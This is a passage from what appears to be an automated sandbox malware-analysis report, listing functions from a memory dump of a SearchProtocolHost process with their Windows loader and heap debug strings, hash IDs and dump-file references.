                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                      • API String ID: 0-3223716464
                                                                                      • Opcode ID: e66c2ca0832d600ba3ce6dec4ce1fb2898577da6141df28d08989c5fbbe9fcbf
                                                                                      • Instruction ID: f8931b8e155cc0fe6ec8b06a1a7c2cf3ff1527f6e3851a3737518f99ce21cef8
                                                                                      • Opcode Fuzzy Hash: e66c2ca0832d600ba3ce6dec4ce1fb2898577da6141df28d08989c5fbbe9fcbf
                                                                                      • Instruction Fuzzy Hash: A4914876640B55AFD721EFE88892B2AB7ECAB45B14F0809D8F944EF251C770AC10C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: a5955342f5c77c80e57b8fcc684c211960cf2b84f3351837f868205eadda1d89
                                                                                      • Instruction ID: 63d1c3fbef84ccb04c8e7f2b509dc7429f6918dd215d5c389b36f720e72d67e8
                                                                                      • Opcode Fuzzy Hash: a5955342f5c77c80e57b8fcc684c211960cf2b84f3351837f868205eadda1d89
                                                                                      • Instruction Fuzzy Hash: 7742EF352487819FC715EF28D888A2AFBE5FF88604F0849AEE896CB651D734D841CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 1acbddcb7bfdc57814e9f68a9f0fd69e269e00caecc3af5d6c62e89acecc93a0
                                                                                      • Instruction ID: 15d9d9d37ae728dd34e3b92fb33887b194015f19246ef55e757394ce7b5e81a5
                                                                                      • Opcode Fuzzy Hash: 1acbddcb7bfdc57814e9f68a9f0fd69e269e00caecc3af5d6c62e89acecc93a0
                                                                                      • Instruction Fuzzy Hash: 17C13775A00B15AFDF24DB6CC894BBEB7A4AF85700F18426AD912EB3D1D7B0D844D391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      • Opcode ID: 00b8ed07769f12444355752c0a0d72b69175204564cfaf880fd3fc104a6d03c6
                                                                                      • Instruction ID: 66eb2328561d3984b0705ca184bae30ace2cefba18424a2de252ca8ac70fe9b9
                                                                                      • Opcode Fuzzy Hash: 00b8ed07769f12444355752c0a0d72b69175204564cfaf880fd3fc104a6d03c6
                                                                                      • Instruction Fuzzy Hash: 1F916974B017549FDB64EF98DD89BAE77A4AF45B14F0801ECEA11AF2C1D7B09801CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0383F0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 0-1745908468
                                                                                      • Opcode ID: 9079b1a3f98ac6797a5975314a327de9a7bf9903450cd5c1a2693c5886c515ec
                                                                                      • Instruction ID: 512cffb76c8c2b5e416cd220942ad09158f09d3aa4e311ca27918eb89bcf4f2b
                                                                                      • Opcode Fuzzy Hash: 9079b1a3f98ac6797a5975314a327de9a7bf9903450cd5c1a2693c5886c515ec
                                                                                      • Instruction Fuzzy Hash: 2A91FD39A04749DFCB12EFA8C444AADBBF2FF8A710F188099E541DB352C7759941CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpInitializeImportRedirection, xrefs: 03807F82, 03807FF6
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037CC5E3
                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 03807FF0
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03807F8C, 03808000
                                                                                      • LdrpInitializeProcess, xrefs: 037CC5E4
                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 03807F7B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 0-475462383
                                                                                      • Opcode ID: ecc37c2ce7feb684f27ddca6f5bc0628caa4f8fea6afae5493a54cc5d7e75cc0
                                                                                      • Instruction ID: af2715625f6a6578ada86addbdf966c332a7c2d6e9be7c4744691ee7a9936326
                                                                                      • Opcode Fuzzy Hash: ecc37c2ce7feb684f27ddca6f5bc0628caa4f8fea6afae5493a54cc5d7e75cc0
                                                                                      • Instruction Fuzzy Hash: 6C31F7B96047419FC215EF68EC59E1AB7E8EF84B10F04059CF895AB291D660EC05CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03801F82
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 03801F6A, 03801FA4, 03801FC4
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03801F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 03801F6F
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03801FC9
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03801FA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
                                                                                      • Opcode ID: 858969fab486f3da404c28cb771b43cc1736a0ce292de12cc8d6fe41fa73b693
                                                                                      • Instruction ID: 4e2be3b919418842477720377fef16c1da6afc83c5ec43a37b970fc4018f4286
                                                                                      • Opcode Fuzzy Hash: 858969fab486f3da404c28cb771b43cc1736a0ce292de12cc8d6fe41fa73b693
                                                                                      • Instruction Fuzzy Hash: 9231C67AB002547BEF20DAC9CC49F6FB6689B41B64F0544ADF911BB283D670AA00C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 037B5167
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 037B519B
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 037B534B
                                                                                      • WindowsExcludedProcs, xrefs: 037B514A
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 037B5272
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: 2992c067577a5f05f10b92f3e5e81fd58d5000b3ac0fd8e2378f9b6c03ce2f5e
                                                                                      • Instruction ID: b53db989f4ade5b257ce0bb0a847232a6eae3a653ac6fbe436ee82e81ec22866
                                                                                      • Opcode Fuzzy Hash: 2992c067577a5f05f10b92f3e5e81fd58d5000b3ac0fd8e2378f9b6c03ce2f5e
                                                                                      • Instruction Fuzzy Hash: D5F14E76D01219EFCB11DFA9C984AEEBBBDFF49620F14416AE505EB210D7709E01DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BD6D0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1975516107
                                                                                      • Opcode ID: eddc45f09bcaf7ad8c23f460daa2e1f553c07451767eb1204587828802520510
                                                                                      • Instruction ID: 5633545ad1774d30667ce5fdf191500e0bef4f8adbd71f0fbcb19220c2d4e9ed
                                                                                      • Opcode Fuzzy Hash: eddc45f09bcaf7ad8c23f460daa2e1f553c07451767eb1204587828802520510
                                                                                      • Instruction Fuzzy Hash: 5E513475A047499FCB24EFA8C5887EEBBF1FF48304F1841ADC805AB291D774A881CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03787662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      • API String ID: 0-3061284088
                                                                                      • Opcode ID: eb51d924183097e2c7b5ef07ec2bde271d47d3b08f2c08ed89182229ac1689dd
                                                                                      • Instruction ID: 82c6ca0fbfde50eb77c92a7acd1c24f301408c3f2ffedde803574ac1c4293eff
                                                                                      • Opcode Fuzzy Hash: eb51d924183097e2c7b5ef07ec2bde271d47d3b08f2c08ed89182229ac1689dd
                                                                                      • Instruction Fuzzy Hash: 0A017037194784EED319F76CE41DF56B794EB86B74F1840D9E4004F5A1CA99D840E160
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      • API String ID: 0-379654539
                                                                                      • Opcode ID: 75566528b0d09444f0f33fe9ed96ee991a411808ff80e08778b2e22acb7a24b5
                                                                                      • Instruction ID: 7d49aced50d6876ba023b710754265c3dada7e1cc15e7aa7ffd5c21a22b61538
                                                                                      • Opcode Fuzzy Hash: 75566528b0d09444f0f33fe9ed96ee991a411808ff80e08778b2e22acb7a24b5
                                                                                      • Instruction Fuzzy Hash: 55C17A74209382CFEB51CF58D084B6AB7F4BF89704F048A6AF9968B351E734C945DB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037C8341
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 037C847E
                                                                                      • @, xrefs: 037C84B1
                                                                                      • LdrpInitializeProcess, xrefs: 037C8342
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 2994545307-1918872054
                                                                                      • Opcode ID: 292eb8097403545322edf8fa1ae0504962dd796d6ba909c20b353179364002bd
                                                                                      • Instruction ID: 365c6e9dd63efaf2ba04cf5465b0a75307b67de839f9c2d4067a5db8ef97ff23
                                                                                      • Opcode Fuzzy Hash: 292eb8097403545322edf8fa1ae0504962dd796d6ba909c20b353179364002bd
                                                                                      • Instruction Fuzzy Hash: AF918B71158380BFD721DE61CC84EAFBBECAB88744F44096EFA89D6151E334DA04CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • .Local, xrefs: 037C27F8
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03801FE3, 038020BB
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 03801FE8
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 038020C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      • API String ID: 0-1239276146
                                                                                      • Opcode ID: 750797d630b7fd5686b38cb7687f638eb897b67b6f622bc6fdef6db6efd5fbfd
                                                                                      • Instruction ID: ee726502448d104cb1ce49229f216cac257f4d5148b2d334a0cb6bedd1423523
                                                                                      • Opcode Fuzzy Hash: 750797d630b7fd5686b38cb7687f638eb897b67b6f622bc6fdef6db6efd5fbfd
                                                                                      • Instruction Fuzzy Hash: 6BA1A0359103699BDF24CF94CC88BA9B3B5BF58314F1949EDD808AB292D7709E81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037963CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 037F0EB5
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 037F0DEC
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 037F0E72
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 037F0E2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      • API String ID: 0-1468400865
                                                                                      • Opcode ID: 8577b0c93239679a58982775a6d0ef8d3eec67f14c62315caff28059142eccda
                                                                                      • Instruction ID: 861f6e7c664fd40e5ac61e8601da991a9312972e11f20fcd5c8b770d3d23875d
                                                                                      • Opcode Fuzzy Hash: 8577b0c93239679a58982775a6d0ef8d3eec67f14c62315caff28059142eccda
                                                                                      • Instruction Fuzzy Hash: 2B71C1B1904304EFDB60DF54C884F9B7BACEF85764F4406A9F9488A256D334E688CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 2994545307-2586055223
                                                                                      • Opcode ID: 80542fa4f9b3bd86b3bfcd4e3524da1c455e8ae2c6a0eef88efcc1730469a22b
                                                                                      • Instruction ID: 2d100d5f19c5ae1281245614d805bc62beead4924bf623e34d173cde3b3739ea
                                                                                      • Opcode Fuzzy Hash: 80542fa4f9b3bd86b3bfcd4e3524da1c455e8ae2c6a0eef88efcc1730469a22b
                                                                                      • Instruction Fuzzy Hash: 8F61E379244780AFE321DF68D848F67B7E9EF88B50F080999F955CB691D734E840CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037FA7AF
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 037FA79F
                                                                                      • LdrpDynamicShimModule, xrefs: 037FA7A5
                                                                                      • apphelp.dll, xrefs: 037B2382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      • Opcode ID: 56ec962266c480003f0010f59f39096082a5168c59bb52096826ac69493ca08b
                                                                                      • Instruction ID: 50e5cafccd15b17f00c8b64409f0d25af2361d998089e61fc1dbb2b8764f41c7
                                                                                      • Opcode Fuzzy Hash: 56ec962266c480003f0010f59f39096082a5168c59bb52096826ac69493ca08b
                                                                                      • Instruction Fuzzy Hash: AB312A79A00600EFDB50EF5CD885E6E77B9FB84B10F1804ADEA15AB346D7B09841DF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037890F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 7fe2cfce6c4038538b8029dc99d8208db94135608fa4b8919aec8e122ec71371
                                                                                      • Instruction ID: f757c6d93a430182b0a6601518ac7d022cb7ceb024a4951b0201f9cf0b6e6508
                                                                                      • Opcode Fuzzy Hash: 7fe2cfce6c4038538b8029dc99d8208db94135608fa4b8919aec8e122ec71371
                                                                                      • Instruction Fuzzy Hash: 5031E676A44204FFCB11EB54CC88FAEBBB8FF49770F1440A1E915AB291D770E941DA61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03839060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $ $0
                                                                                      • API String ID: 0-3352262554
                                                                                      • Opcode ID: d7460881984bbd729485ad67d0b39c169dec855ba759562fbb4df82a7037d99e
                                                                                      • Instruction ID: 696a152fedf3cafbda6df950d888bf5b233bbf99968bba1947af52f6e02a539a
                                                                                      • Opcode Fuzzy Hash: d7460881984bbd729485ad67d0b39c169dec855ba759562fbb4df82a7037d99e
                                                                                      • Instruction Fuzzy Hash: 0E32F0B16083819FD350CFA8C884B5AFBE5BB89344F04496EF599CB350D7B5E948CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A0680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
